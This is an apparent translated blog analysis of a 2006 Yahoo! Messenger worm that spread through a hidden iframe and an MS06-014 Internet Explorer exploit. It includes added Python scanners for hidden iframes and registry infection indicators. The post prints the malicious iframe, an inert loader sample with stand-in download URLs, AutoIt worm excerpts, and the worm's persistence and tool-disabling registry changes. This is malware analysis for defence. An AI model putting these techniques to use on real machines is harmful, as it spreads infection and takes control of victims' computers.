I did nothing yesterday (maybe the whole day) except sit in the office supporting the troubleshooting of the database system. Got home at 11pm, too tired to sleep, and suddenly remembered that the Vietnam Olympic team had played some team today, so I went online to read the news about the match. Just as I was about to go to bed, a message arrived on Yahoo! Messenger:
thuong ghe ^, vinatad is hacking you ui, hic :( http:///www.vinatad./index.html
[Picture 1: 'Fight' with Vinatad]
I don't like this sort of thing, but this was the fourth time that day I had received a different message telling me about this attack. Curious, I clicked on the link and it displayed a message like this:
website has BKAV - That site has security by BKAV hacked by bkgenetic_g11
Well, this index.html page clearly does not consist of just those two lines, because NoScript told me that a script had been blocked. Curious, I looked at its source and saw the following:
hacked by bkgenetic_g11
<title>website has BKAV - That site has seccurity by BKAV</title>
<iframe name="quag" frameSpacing="0" src="http:///www.free.s.com/iamblackhat/google.html" frameBorder="0" noResize width="0" height="0" target="_self"></iframe>
There is a hidden iframe pointing to http:///www.free.s.com/iamblackhat/google.html . The source of google.html is where it gets interesting: apart from the i.js file from the Freewebs service, which only inserts banner ads, the entire script is worth reading. Its purpose is to download and run two files, http:///www.vinatad./game.exe and http:///www.vinatad./zend.exe . To do that, the author exploits the vulnerability MS06-014:
Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)
A remote code execution vulnerability exists in the RDS.Dataspace ActiveX control that is provided as part of the ActiveX Data Objects (ADO) and that is distributed in MDAC. An attacker who successfully exploited this vulnerability could take complete control of the affected system.
Microsoft patched this vulnerability in April 2006, but it is still used a lot in browser-based exploits: it is easy to exploit and, being relatively new, still quite effective against unpatched machines. Interestingly, the author uses the Microsoft.XMLHTTP object (AJAX) to silently download the virus onto the victim's computer.
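As an added illustration (not code from the post), here is a small Python scanner for the pattern described above: it parses an HTML page, reports iframes with no visible area, collects script bodies and flags the object names a loader of this kind needs, and extracts any .exe URLs. RDS.Dataspace and Microsoft.XMLHTTP are the objects the post names; ADODB.Stream and Shell.Application are assumed companions (typically used to write the downloaded file and execute it) and are not taken from the post. The two sample pages and the attacker.example URLs are constructed stand-ins for the defaced index.html and google.html.

```python
import re
from html.parser import HTMLParser

# Strings a loader of this kind has to contain. RDS.Dataspace and
# Microsoft.XMLHTTP are the objects named in the post; ADODB.Stream and
# Shell.Application are assumed companions, not taken from the post.
ACTIVEX_INDICATORS = (
    "RDS.Dataspace",
    "Microsoft.XMLHTTP",
    "ADODB.Stream",
    "Shell.Application",
)

# Any http(s) URL ending in .exe inside a script body.
EXE_URL_RE = re.compile(r"https?://[^\s\"'<>]+?\.exe\b", re.IGNORECASE)


def _dim(value):
    """Parse a width/height attribute ('0', '0px', ' 1 '); None if unparsable."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


def is_hidden_iframe(attrs):
    """True when the iframe has no visible area or is hidden by inline style."""
    w, h = _dim(attrs.get("width")), _dim(attrs.get("height"))
    if (w is not None and w <= 1) or (h is not None and h <= 1):
        return True
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


class DriveByScanner(HTMLParser):
    """Collect hidden iframe targets and raw <script> bodies."""

    def __init__(self):
        super().__init__()
        self.hidden_iframes = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # HTMLParser lowercases names; boolean attrs map to None
        if tag == "iframe" and is_hidden_iframe(a):
            self.hidden_iframes.append(a.get("src") or "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser delivers <script> content verbatim through handle_data
        if self._in_script:
            self.scripts.append(data)


def scan_html(html):
    """Summarise the drive-by indicators found in an HTML document."""
    p = DriveByScanner()
    p.feed(html)
    p.close()
    script_text = "\n".join(p.scripts)
    lowered = script_text.lower()
    found = [s for s in ACTIVEX_INDICATORS if s.lower() in lowered]
    return {
        "hidden_iframes": p.hidden_iframes,
        "activex_indicators": found,
        "exe_urls": sorted(set(EXE_URL_RE.findall(script_text))),
        "suspicious": bool(p.hidden_iframes) or "RDS.Dataspace" in found,
    }


# Constructed sample 1: a defaced index.html shaped like the one in the post
# (attacker.example stands in for the real hosting URL).
DEFACED_INDEX = """<html><head>
<title>website has BKAV - That site has seccurity by BKAV</title></head>
<body>hacked by bkgenetic_g11
<iframe name="quag" frameSpacing="0" src="http://attacker.example/iamblackhat/google.html"
 frameBorder="0" noResize width="0" height="0" target="_self"></iframe>
</body></html>"""

# Constructed sample 2: the shape of the loader page, with the object names
# and download URLs present but nothing that executes anything.
LOADER_PAGE = """<html><body><script type="text/javascript">
var rds = new ActiveXObject("RDS.Dataspace");
var xhr = rds.CreateObject("Microsoft.XMLHTTP", "");
var urls = ["http://attacker.example/game.exe", "http://attacker.example/zend.exe"];
</script></body></html>"""

if __name__ == "__main__":
    for name, page in (("index.html", DEFACED_INDEX), ("google.html", LOADER_PAGE)):
        print(name, scan_html(page))
```

The check is deliberately static: the point is to see what a page would do without letting a browser do it. A zero-size iframe on its own is only a hint (ad networks use them too), so the result keeps the iframe targets separate from the ActiveX indicators and lets you follow the src to the next page yourself.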
Hearing "made-in-VN virus", you probably guessed that it uses AutoIt to spread over Yahoo! Messenger, as a whole series of such "kids" have appeared recently. What sets this one apart is that it exploits an Internet Explorer vulnerability and then uses AJAX to install itself silently. If you have not updated Internet Explorer, simply clicking the link sent over Yahoo! Messenger infects your computer immediately.
I quickly downloaded the two files http:///www.vinatad./zend.exe and http:///www.vinatad./game.exe . The VirusTotal scan results are as follows:
Antivirus            Version          Update       Result
AntiVir              7.2.0.39         11.16.2006   no virus found
Authentium           4.93.8           11.16.2006   no virus found
Avast                4.7.892.0        11.15.2006   no virus found
AVG                  386              11.15.2006   no virus found
BitDefender          7.2              11.16.2006   no virus found
CAT-QuickHeal        8.00             11.15.2006   TrojanDownloader.Agent.axn
ClamAV               devel-20060426   11.16.2006   no virus found
DrWeb                4.33             11.16.2006   no virus found
eTrust-InoculateIT   23.73.57         11.16.2006   no virus found
eTrust-Vet           30.3.3195        11.16.2006   no virus found
Ewido                4.0              11.15.2006   no virus found
Fortinet             2.82.0.0         11.16.2006   no virus found
F-Prot               3.16f            11.16.2006   no virus found
F-Prot4              4.2.1.29         11.16.2006   no virus found
Ikarus               0.2.65.0         11.15.2006   no virus found
Kaspersky            4.0.2.24         11.16.2006   no virus found
McAfee               4896             11.15.2006   no virus found
Microsoft            1.1609           11.16.2006   no virus found
NOD32v2              1868             11.15.2006   no virus found
Norman               5.80.02          11.15.2006   no virus found
Panda                9.0.0.4          11.15.2006   no virus found
Prevx1               V2               11.16.2006   no virus found
Sophos               4.11.0           11.15.2006   no virus found
TheHacker            6.0.1.119        11.15.2006   Trojan/Downloader.AutoIt.e
UNA                  1.83             11.15.2006   Backdoor.Agent.9
VBA32                3.11.1           11.15.2006   no virus found
VirusBuster          4.3.15:9         11.15.2006   no virus found
Only three of the antivirus engines flagged game.exe and zend.exe . A preliminary look at the strings shows that both files are built on the AutoIt engine and packed with UPX. I unpacked them and loaded them into a VMware virtual machine running Windows XP Service Pack 2. Decompiling the AutoIt source of both is easy because they use no protection at all; I just used the Exe2Aut program for AutoIt that I already had, and their source code was in hand:
; AUT2EXE VERSION: 3.2.0.1
; ----------------------------------------------------------------------------
; AUT2EXE INCLUDE-START: E: hoc tapnewhackdungyeuanh_mophatTeachokRungame.au3
; ----------------------------------------------------------------------------
; ------------------------------------------------
; Software: DKC Bot
; Version: 1.1
; Purpose: Advertise a website through Y!M
; Completed: September 1, 2006
; -------------------------------------------------------
My first impression is that these two AutoIt programs are simpler than the other AutoIt malware I have met before. The source of zend.exe is only three lines:
While (99999999)
    Ping("localhost", 1)
WEnd
The source code of game.exe is quite "classic", divided into sections such as:
; Setup
#NoTrayIcon
$trinhduyet = "hacked by bkgenetic_g11"
$ngaunhien = Random(0, 9, 1)
; Random website
Dim $web[10]
$website = "http:///www.vinatad./index.html"
$include = "http:///www.vinatad./hotline.html"
; Random messages
Dim $tin[10]
$tin[0] = "that site hacked by bkgenetic_g11 via nutrition, phuc that, hic" & $website
$tin[1] = "thuong ghe ^, vinatad is hacked you ui, hic :(" & $website
$tin[2] = "This is a poet's hand, hic :(" & $website
$tin[3] = "Den chiu, vinatad ca bi hack, VNiss lam ma ??? :))" & $website
$tin[4] = "bun ghe, hack hui rui ^" & $website
$tin[5] = "that site hacked by bkgenetic_g11 via nutrition, phuc that, hic)" & $website
$tin[6] = "Den chiu, no gi de noi :))))" & $website
$tin[7] = "thuong ghe ^, vinatad bi hack you ui, hi :))" & $website
$tin[8] = "en chiu, vinatad ca bi hack, VNiss lam ma ?? :(" & $website
$tin[9] = "en chiu, vinatad ca bi hack, VNiss lam ma ?? :(" & $website
$tinnhan = $tin[$ngaunhien]
; Infect the system
; Write to the Registry
; Change status & send messages
When infecting the system, game.exe copies itself to C:\Windows\taskmng.exe . It then changes several settings in the Registry to:
- Automatically run when Windows starts
- Modify the homepage of Internet Explorer
- Disable regedit tool and Task Manager
- Modify the Launchcast address of Yahoo! Messenger
Finally, as usual, it spreads by mass-messaging everyone on the contact list via Yahoo! Messenger and changing the infected user's status message.
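As an added example (not the author's code, nor the worm's), here is a Python check for the Registry changes listed above, run against a registry export rather than the live Registry so that it works anywhere: it parses a .reg file, then looks for a Run entry pointing at taskmng.exe, the two policy values that disable regedit and Task Manager, and an Internet Explorer start page that differs from a baseline you supply. The key paths are the standard Windows ones and the HKCU hive is an assumption (the post does not say which hive); the Yahoo! Messenger Launchcast key is not on the page and is left out rather than guessed; the sample export is constructed.

```python
import re

# Registry locations corresponding to the post's list of changes. HKCU is an
# assumption; the post does not say which hive. The Yahoo! Messenger
# Launchcast setting is also modified, but its key is not given on the page,
# so it is deliberately not guessed here.
RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
POLICY_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System"
IE_MAIN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main"
DROPPED_FILE = "taskmng.exe"  # the post's dropped copy, C:\Windows\taskmng.exe


def parse_reg_export(text):
    """Parse the subset of 'reg export' syntax needed here.

    Returns {key_path: {value_name: raw_data}}; raw_data keeps the .reg
    encoding ("..." for REG_SZ, dword:xxxxxxxx for REG_DWORD).
    """
    result, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1)
            result.setdefault(current, {})
            continue
        m = re.match(r'^(?:"([^"]+)"|@)=(.*)$', line)
        if m and current is not None:
            name = m.group(1) if m.group(1) is not None else "@"
            result[current][name] = m.group(2)
    return result


def reg_string(raw):
    """Decode a REG_SZ literal: strip the quotes and undo backslash escaping."""
    if len(raw) >= 2 and raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    return raw


def reg_dword(raw):
    """Decode dword:XXXXXXXX to an int; None for anything else (or missing)."""
    m = re.match(r"^dword:([0-9a-fA-F]{8})$", raw or "")
    return int(m.group(1), 16) if m else None


def find_infection_indicators(reg, expected_start_page):
    """Return findings for the changes the post attributes to game.exe."""
    findings = []
    for name, raw in reg.get(RUN_KEY, {}).items():
        if DROPPED_FILE in reg_string(raw).lower():
            findings.append(f"autorun: {name} -> {reg_string(raw)}")
    policy = reg.get(POLICY_KEY, {})
    for value in ("DisableRegistryTools", "DisableTaskMgr"):
        if reg_dword(policy.get(value)) == 1:
            findings.append(f"policy: {value}=1")
    start = reg.get(IE_MAIN_KEY, {}).get("Start Page")
    if start is not None and reg_string(start) != expected_start_page:
        findings.append(f"ie start page: {reg_string(start)}")
    return findings


# Constructed sample export of an infected profile (the start page URL is a
# placeholder; the post does not say what the worm sets it to).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"taskmng"="C:\\Windows\\taskmng.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001
"DisableTaskMgr"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://attacker.example/index.html"
'''

if __name__ == "__main__":
    for finding in find_infection_indicators(parse_reg_export(SAMPLE_REG), "about:blank"):
        print(finding)
```

On a real machine you would produce the input with `reg export HKCU\Software ...` from a clean environment (the worm disables regedit, but the command-line tool and an offline hive are not affected) and feed the file to the script. The start-page comparison needs a baseline because the post only says the home page is changed, not to what.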
Although this virus is not very dangerous, the author could easily replace game.exe or zend.exe with far more capable versions, whether written in AutoIt or adapted from the virus and bot source code that is freely available on the Internet. Combined with Yahoo! Messenger and the vulnerabilities in Internet Explorer, a real disaster is entirely possible. How to protect yourself? Firefox + NoScript is a viable solution.